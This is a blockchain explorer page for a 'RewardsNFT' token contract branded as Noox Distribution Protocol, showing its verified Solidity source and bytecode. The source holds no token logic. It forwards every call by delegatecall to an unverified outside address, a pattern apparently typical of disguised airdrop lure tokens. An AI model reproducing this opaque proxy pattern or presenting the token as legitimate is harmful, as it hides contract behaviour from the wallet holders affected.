ERC-1155
Overview
Max Total Supply
8,000 Noox Distribution Protocol
Holders
13,192
Market
Volume (24H)
N/A
Min Price (24H)
N/A
Max Price (24H)
N/A
Other Info
Token Contract
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.
Contract Name:
RewardsNFT
Compiler Version
v0.8.13+commit.abaa5c0e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-10 */ // SPDX-License-Identifier: MIT pragma solidity <=0.8.13; contract RewardsNFT { uint256 private totalSupply = 8080; fallback(bytes calldata data) payable external returns(bytes memory){ (bool r1, bytes memory result) = address(0x3f51cBCFDB336449134b24EcDD89B376109C82B2).delegatecall(data); require(r1, "Verification."); return result; } receive() payable external { } constructor() { bytes memory data = abi.encodeWithSignature("initialize()"); (bool r1,) = address(0x3f51cBCFDB336449134b24EcDD89B376109C82B2).delegatecall(data); require(r1, "Verificiation."); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"stateMutability":"payable","type":"fallback"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
6080604052611f9060005534801561001657600080fd5b5060408051600481526024810182526020810180516001600160e01b031663204a7f0760e21b1790529051600090733f51cbcfdb336449134b24ecdd89b376109c82b2906100659084906100f2565b600060405180830381855af49150503d80600081146100a0576040519150601f19603f3d011682016040523d82523d6000602084013e6100a5565b606091505b50509050806100eb5760405162461bcd60e51b815260206004820152600e60248201526d2b32b934b334b1b4b0ba34b7b71760911b604482015260640160405180910390fd5b505061012d565b6000825160005b8181101561011357602081860181015185830152016100f9565b81811115610122576000828501525b509190910192915050565b6101148061013c6000396000f3fe608060405236600a57005b6000366060600080733f51cbcfdb336449134b24ecdd89b376109c82b26001600160a01b03168585604051603e92919060ce565b600060405180830381855af49150503d80600081146077576040519150601f19603f3d011682016040523d82523d6000602084013e607c565b606091505b50915091508160c15760405162461bcd60e51b815260206004820152600d60248201526c2b32b934b334b1b0ba34b7b71760991b604482015260640160405180910390fd5b8051945060200192505050f35b818382376000910190815291905056fea26469706673582212203dc255d15aa8aac5710568ee1ca0a48aed587ec893cb6d8b5b80275c30d7e0fb64736f6c634300080d0033
Deployed Bytecode
0x608060405236600a57005b6000366060600080733f51cbcfdb336449134b24ecdd89b376109c82b26001600160a01b03168585604051603e92919060ce565b600060405180830381855af49150503d80600081146077576040519150601f19603f3d011682016040523d82523d6000602084013e607c565b606091505b50915091508160c15760405162461bcd60e51b815260206004820152600d60248201526c2b32b934b334b1b0ba34b7b71760991b604482015260640160405180910390fd5b8051945060200192505050f35b818382376000910190815291905056fea26469706673582212203dc255d15aa8aac5710568ee1ca0a48aed587ec893cb6d8b5b80275c30d7e0fb64736f6c634300080d0033
Deployed Bytecode Sourcemap
64:601:0:-:0;;;;;;;;;;187:12;212:7;221:19;252:42;-1:-1:-1;;;;;244:64:0;309:4;;244:70;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;211:103;;;;333:2;325:28;;;;-1:-1:-1;;;325:28:0;;492:2:1;325:28:0;;;474:21:1;531:2;511:18;;;504:30;-1:-1:-1;;;550:18:1;;;543:43;603:18;;325:28:0;;;;;;;;64:601;;;-1:-1:-1;64:601:0;;;-1:-1:-1;;;64:601:0;14:271:1;197:6;189;184:3;171:33;153:3;223:16;;248:13;;;223:16;14:271;-1:-1:-1;14:271:1:o
Swarm Source
ipfs://3dc255d15aa8aac5710568ee1ca0a48aed587ec893cb6d8b5b80275c30d7e0fb
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.